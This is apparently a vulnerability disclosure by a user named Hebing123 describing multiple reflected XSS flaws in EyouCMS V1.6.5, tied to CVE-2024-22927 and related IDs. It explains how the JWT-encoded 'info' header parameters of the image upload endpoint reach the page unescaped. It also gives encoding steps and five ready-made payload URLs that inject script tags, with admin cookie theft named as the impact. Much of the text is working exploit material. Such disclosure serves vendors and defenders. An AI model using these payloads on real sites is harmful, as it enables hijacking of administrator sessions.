EyouCMS-V1.6.5 has multiple reflective XSS vulnerabilities

[Hebing123]

Summary EyouCMS-V1.6.5 When uploading images locally, the program will use the info parameter to set the parameters carried by the upload form. Multiple reflective XSS vulnerabilities can be created by modifying the JWT encrypted HEADER of the accepted JSON data and setting the parameter it contains to a malicious value. These parameters are: num,input,path,func,is_water _There is no update on github, the latest installation package (V1.6.5) is: https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip_ Details The exploit of this XSS vulnerability is mainly to construct the form to carry parameters, header is directly referenced by <input> into the page. The info parameter should be replaced with a "+" if it contains a "-" after JWT encryption. The guess is that the developer may have incorrectly implemented the logic of URL encoding and decoding, resulting in accepting only "+" and not "-". This may be because they only consider standard URL encoding rules and ignore URL security encoding rules. Impact An administrator who is already logged in can have a cookie stolen after accessing the malicious url. POC HEADER:ALGORITHM & TOKEN TYPE：

{
  "num": "1",
  "size": "2097152",
  "input": "",
  "func": "head_pic_call_back",
  "path": "allimg",
  "is_water": "1'\">Injection Point",
  "alg": "HS256"
}

Note: you do not need to carry data when encrypting, just encrypt the corresponding parameter of the header, replace "-" with "+", and then perform url encoding.Don't go in the wrong order, or you'll convert the + to a space.

In Header, when the num parameter causes a reflected XSS vulnerability, the payload is: http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the input parameter causes a reflected XSS vulnerability, the payload is: http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the path parameter causes a reflected XSS vulnerability, the payload is: http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the func parameter causes a reflected XSS vulnerability, the payload is: http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the is_water parameter causes a reflected XSS vulnerability, the payload is: http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

[Hebing123]

This is a difficult vulnerability to detect, and I will add it if I get the CVE number in the future.

[Hebing123]

This is the vulnerability exploitation reference for CVE-2024-22927,CVE-2024-23031,CVE-2024-23032,CVE-2024-23033,CVE-2024-23034.